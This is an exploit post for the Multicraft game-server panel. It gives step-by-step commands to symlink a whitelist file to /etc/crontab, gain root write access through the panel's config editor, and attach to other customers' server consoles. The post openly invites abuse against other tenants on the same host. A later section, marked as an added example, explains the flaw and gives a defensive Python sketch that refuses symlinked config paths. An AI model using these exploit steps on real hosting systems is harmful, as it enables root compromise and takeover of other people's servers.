Multicraft remote authenticated root exploit
Can be used to leverage console access, as well as "force op" oneself on any server hosted on the same provider as you.
Actually doing this exploit may cost you money and time!!!
1. Obtain Multicraft panel account on the same hosting provider as the target
2. Load a shell plugin (easy to code, and I'm sure there's at least 1 public one)
3. Connect to Bukkit server with shell plugin loaded
4. Execute this:
rm white-list.txt
ln -s /etc/crontab white-list.txt
5. Go back to the panel, click Config Files
6. Edit white-list.txt
7. You now have write access, as root, to the system crontab. Raise some hell.
NOTE: The built-in editor uses Windows line endings. You'll need a Firefox/Chrome add-on like Tamper Data to change these to "normal" line endings: "\n" instead of "\r\n" (%0A, not %0D%0A).
In order to actually get op on the target server, from here on out, we'll need to not be retards. Run this after becoming root:
sudo -u (target) screen -x
You should now be in their console.
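The steps above work because the panel's config editor writes white-list.txt with root privileges and follows the symlink planted in the server directory. The sketch below is an added example, not part of the original post and not Multicraft's own code: it shows how a privileged file editor can refuse such a path. The names open_config_for_write, save_config and UnsafeConfigPath are hypothetical.

```python
import errno
import os
import stat

class UnsafeConfigPath(Exception):
    """The requested config file is not a plain file inside the server directory."""

def open_config_for_write(server_dir, name):
    """Return a write fd for server_dir/name, refusing symlinks and hard links."""
    if name in ("", ".", "..") or os.path.basename(name) != name:
        raise UnsafeConfigPath(f"bad file name: {name!r}")
    # Pin the directory so the lookup below is relative to this exact inode.
    dir_fd = os.open(server_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        # O_NOFOLLOW: fail instead of following a symlink in the last component.
        # No O_TRUNC and no O_CREAT: nothing is modified before the checks pass.
        flags = os.O_WRONLY | os.O_NOFOLLOW | os.O_NONBLOCK
        fd = os.open(name, flags, dir_fd=dir_fd)
    except OSError as exc:
        if exc.errno in (errno.ELOOP, errno.EMLINK):
            raise UnsafeConfigPath(f"{name} is a symlink") from exc
        raise
    finally:
        os.close(dir_fd)
    st = os.fstat(fd)
    # A hard link to a file elsewhere would pass O_NOFOLLOW, so check nlink too.
    if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
        os.close(fd)
        raise UnsafeConfigPath(f"{name} is not a plain single-link file")
    return fd

def save_config(server_dir, name, text):
    """Replace the file's contents only after every check has passed."""
    fd = open_config_for_write(server_dir, name)
    os.ftruncate(fd, 0)
    with os.fdopen(fd, "w", newline="") as fh:
        fh.write(text)
```

Performing the write as the server's unprivileged user instead of root limits the impact even if one of these checks is missed.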